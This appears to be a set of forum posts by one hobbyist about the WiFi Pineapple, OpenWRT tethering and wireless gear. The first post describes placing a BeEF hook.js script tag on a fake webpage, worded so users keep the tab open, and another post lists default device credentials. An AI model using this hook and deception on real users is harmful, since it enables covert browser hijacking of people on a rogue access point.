  1. This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking.

Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

    inject this:

    <script language='Javascript' src="192.168.1.100/hook.js"></script>

where 192.168.1.100 is the IP address (local or remote) of the beEF server

  2. Without sounding like a fanboy the simple fact is android creates the best enviroment for intercompatability with openwrt/linux etc, if you want to get you blackberry to work I suggest you search for openwrt and blackberry teathering and trying to install packages and such to get it working. As supply and demand will probarly not result in blackberry teathering been included in stock pineapple firmware.

Before you mess around with getting these packages to work and changing configurating files I would suggest that you get comfortable with the re-flashing of the pineapple just incase!

  3. sark,

Ensure you are connecting to 172.16.42.1:1471/pineapple (user:root pass:pineapplesareyummy)

Also, as you are using a usb ethernet adaptor, I would use the usb passthrough option to pass the whole adaptor through to the virtual machine, most likely it will be supported under linux.

Using the usb passthrough as the connection to the pineapple it would be a good idea to create a second 'bridged' adaptor which avoid triple NAT'ing which would reduce network speeds.

  4. This is not supported by the jasager team.

I would recommend getting a short usb extension cable and cutting the power cable, (red I think - although do your research before you continue) leave the other cables intact, this will prevent 'backpower' flowing to your pineapple.

  5. Why: Because I'm lazy and Don't want to write it myself!

I noticed when the pineapple has a usb0 device (android phone) it automatically adjusts its iptables rules to use this at the gateway to the internet.

Wondered if i could have this script so i can use it on a personal project.

Background for those who are interested: I have a internet connection with Virgin Media, which constantly drops out. I also have unlimited teathering on my Galaxy S3 with ThreeUK, so want to be able to plug it into my WR1043N and have it automatically foward all traffic over the usb0 connection. I want to also edit the script so when usb0 is removed the WAN ethernet port is once again used as the internet access gateway.

    Many Thanks,

    IntheDMZ

  6. Thanks for the quick response, Sebkinne!

Unfortunaly it is still saying that I do not meet requirements:

Did I run the install right or am I still missing something?

Are you running the Dev version firmware 2.7.7?

I think Seb means you must be running this firmware to have the latest kernel, although having said that it seems you are using to correct kernel according to your uname -a

  7. I wouldn't have thought the power would be a problem, i have used a setup very similar to yours (not the same modem) except i had a small unpowered hub and a usb stick plugged in too.

Try having a look at this forum thread and see if it helps:

Edit: also worth backing up your current 3G settings before starting the change product/vender IDs

  8. Thought I'd do the 'post my gear' bit.

left to right top row and down.

    1. Novatech Nfinity ultrabook running dual boot Ubuntu and backtrack

    2. TP-link WR703N running OpenWRT with a unlocked 3G modem

    3. Raspberry PI running Debian with kismet server installed

    4. TP-link WR841N running OpenWRT with kismet Drone (to pipe to PI)

    5. Linksys WRT54GS running OpenWRT with kismet drone (to pipe to PI)

    6. Pc engines Wrap 2.c running OpenWRT aircrack-ng installed

Bottom right of the Pic, i'm sure you will all reconise the Wifi Pineapples and Alfa USB adaptor, along with the anker battery to power the pineapples.

Bottom left, couple of usb sticks and a yubikey.
